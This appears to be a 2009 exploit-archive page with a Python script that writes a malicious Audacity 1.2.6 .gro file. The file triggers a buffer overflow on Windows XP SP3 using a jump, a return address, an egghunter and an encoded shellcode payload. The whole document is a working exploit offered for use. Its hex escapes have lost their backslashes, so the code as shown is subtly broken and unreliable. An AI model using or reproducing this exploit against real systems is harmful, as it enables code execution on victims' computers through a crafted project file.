Audacity 1.2.6 (gro File) Buffer overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audacity 1.2.6 (gro File) Buffer overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd
# Previous Title : HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# Next Title : HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)

#exploit.py
# Audacity 1.2.6 (gro File) Buffer overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
#####################################################
# i know this exploit already been posted, but the author
# used an address as an universal,well,it's universal but
# it can't be called to jump.because it cause privileged_
# exception,so you can just use it.
#
# Tested on: Windows xp sp3
#

chars = "x44" * 174
ns= "xebx08x90x90"
sh= "xbex2exd1x72" # Windows xp sp3 - msacm32.drv

nops= "x90"* 20

eggh= "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x69x72x61x71x8BxFAxAFx75xEAxAFx75xE7xFFxE7"

shellcode= "x69x72x61x71x69x72x61x71"

shellcode+= (
"x89xe6xd9xc7xd9x76xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x43x30x43x30x45x50x45x30x4bx39"
"x4ax45x46x51x4ex32x51x74x4cx4bx46x32x44x70x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4ex6bx51x62"
"x47x58x44x4fx48x37x51x5ax45x76x46x51x49x6fx45"
"x61x4fx30x4ex4cx47x4cx51x71x51x6cx45x52x46x4c"
"x47x50x4fx31x4ax6fx44x4dx45x51x4fx37x4dx32x48"
"x70x42x72x46x37x4cx4bx46x32x42x30x4ex6bx50x42"
"x45x6cx47x71x4ex30x4ex6bx51x50x51x68x4cx45x4f"
"x30x44x34x51x5ax46x61x48x50x42x70x4cx4bx50x48"
"x42x38x4cx4bx50x58x51x30x46x61x4ex33x4dx33x47"
"x4cx43x79x4cx4bx50x34x4cx4bx46x61x4ax76x46x51"
"x49x6fx44x71x49x50x4cx6cx4bx71x4ax6fx46x6dx47"
"x71x4fx37x46x58x4bx50x43x45x4ax54x43x33x43x4d"
"x4bx48x47x4bx43x4dx51x34x43x45x4bx52x42x78x4c"
"x4bx46x38x45x74x46x61x4ax73x45x36x4cx4bx46x6c"
"x50x4bx4ex6bx43x68x45x4cx46x61x4ex33x4cx4bx46"
"x64x4ex6bx43x31x4ex30x4ex69x51x54x46x44x51x34"
"x51x4bx51x4bx43x51x51x49x51x4ax50x51x49x6fx49"
"x70x51x48x51x4fx43x6ax4cx4bx42x32x4ax4bx4fx76"
"x43x6dx50x6ax47x71x4ex6dx4dx55x4ex59x47x70x43"
"x30x45x50x46x30x42x48x44x71x4ex6bx42x4fx4fx77"
"x4bx4fx4ax75x4dx6bx4dx30x45x4dx46x4ax44x4ax42"
"x48x49x36x4cx55x4dx6dx4dx4dx49x6fx4ex35x45x6c"
"x45x56x51x6cx44x4ax4bx30x4bx4bx4bx50x51x65x44"
"x45x4dx6bx50x47x44x53x42x52x50x6fx42x4ax43x30"
"x46x33x4bx4fx4ax75x42x43x50x61x50x6cx42x43x43"
"x30x41x41")


file = open('Devil.gro','w')
file.write(chars+ns+sh+nops+eggh+chars+shellcode)
file.close()